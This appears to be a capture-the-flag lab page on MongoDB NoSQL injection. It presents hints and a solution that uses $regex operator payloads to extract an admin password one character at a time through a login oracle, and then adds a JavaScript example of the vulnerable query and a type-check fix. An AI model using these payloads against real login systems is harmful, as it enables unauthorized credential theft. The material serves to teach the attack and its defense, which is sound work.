MongoDB

First Exfiltration


Retrieving data

Now that you have an oracle on the database, try to recover the admin password.

Goal: find the admin password

The flag uses the following format: FLAG\{\d+\}

Hints

Hint #1

You should try other operators instead of $ne to bypass the password check.

Hint #2

$regex can probably help you.

Solution


By using the $regex operator, you can exfiltrate the password character by character.

{"$regex": "^X"} -> User not found
{"$regex": "^F"} -> admin
{"$regex": "^FL"} -> admin
{"$regex": "^FLA"} -> admin
{"$regex": "^FLAG{1"} -> admin

You just need to iterate over all possible characters until the password is fully recovered.
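
The defender's side of this oracle, as an added example that is not code from the challenge: a small in-memory stand-in for MongoDB's operator matching shows why passing the parsed JSON body straight into the query produces the admin / User not found responses above, and how a string type check removes them. The user record, the function names and the "Invalid input" response are assumptions made for the illustration.

```javascript
// Constructed sample record; the flag value is made up for this example.
const users = [{ username: "admin", password: "FLAG{1234}" }];

// Minimal stand-in for how MongoDB matches one field: a plain value means
// equality, an object is interpreted as a set of query operators.
function matchField(stored, cond) {
  if (cond !== null && typeof cond === "object") {
    return Object.entries(cond).every(([op, arg]) => {
      if (op === "$ne") return stored !== arg;
      if (op === "$regex") return new RegExp(arg).test(stored);
      throw new Error("unsupported operator " + op);
    });
  }
  return stored === cond;
}

// Hypothetical helper mimicking collection.findOne(query).
function findOne(query) {
  const hit = users.find((u) =>
    Object.entries(query).every(([field, cond]) => matchField(u[field], cond))
  );
  return hit || null;
}

// Vulnerable: the body fields reach the query unchanged, so a JSON object
// in "password" is evaluated as an operator and the response leaks a match.
function loginVulnerable(body) {
  const user = findOne({ username: body.username, password: body.password });
  return user ? user.username : "User not found";
}

// Hardened: only string credentials are accepted, so operator objects such
// as {"$ne": ...} or {"$regex": ...} never reach the query layer.
function loginHardened(body) {
  if (typeof body.username !== "string" || typeof body.password !== "string") {
    return "Invalid input";
  }
  const user = findOne({ username: body.username, password: body.password });
  return user ? user.username : "User not found";
}
```

Storing a password hash and comparing it in application code, rather than querying on the password field, also keeps the secret out of anything a query operator can test.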
